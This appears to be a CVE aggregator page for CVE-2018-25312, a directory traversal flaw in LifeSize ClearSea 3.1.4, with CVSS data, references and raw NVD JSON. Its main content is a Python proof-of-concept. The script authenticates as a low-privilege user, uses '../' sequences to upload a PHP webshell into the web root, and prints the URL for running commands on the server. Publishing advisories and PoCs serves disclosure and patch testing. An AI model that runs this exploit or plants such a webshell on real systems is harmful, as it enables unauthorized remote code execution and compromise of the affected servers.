CVE-2018-25312

Description

LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui interface. Attackers can exploit the upload endpoint with directory traversal sequences to write files to arbitrary locations on the system, enabling remote code execution.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LifeSize ClearSea 3.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_host = "http://vulnerable-host"
login_url = f"{target_host}/login.php"
upload_url = f"{target_host}/smartgui/upload.php"

attacker_session = requests.Session()

# Step 1: Authenticate (Low privilege required per PR:L)
credentials = {
    "username": "low_priv_user",
    "password": "password"
}
attacker_session.post(login_url, data=credentials)

# Step 2: Prepare malicious payload (PHP webshell)
# Using directory traversal sequence '../' to escape web root
webshell_content = "<?php system($_GET['cmd']); ?>"

# The vulnerability allows manipulating the path parameter
files = {
    'file': ('../../var/www/html/shell.php', webshell_content, 'application/x-php')
}

data = {
    'path': '../../../tmp' # Additional path manipulation if needed
}

# Step 3: Upload the payload
response = attacker_session.post(upload_url, files=files, data=data)

if response.status_code == 200:
    print("[+] File uploaded successfully.")
    print(f"[+] Check your shell at: {target_host}/shell.php?cmd=whoami")
else:
    print("[-] Upload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25312
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25312
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25312/
[4] VulDB https://vuldb.com/cve/CVE-2018-25312
[5] https://www.exploit-db.com/exploits/44390
[6] https://www.vulncheck.com/advisories/lifesize-clearsea-directory-traversal-remote-code-execution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25312", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:26.903", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui interface. Attackers can exploit the upload endpoint with directory traversal sequences to write files to arbitrary locations on the system, enabling remote code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44390", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/lifesize-clearsea-directory-traversal-remote-code-execution", "source": "[email protected]"}]}}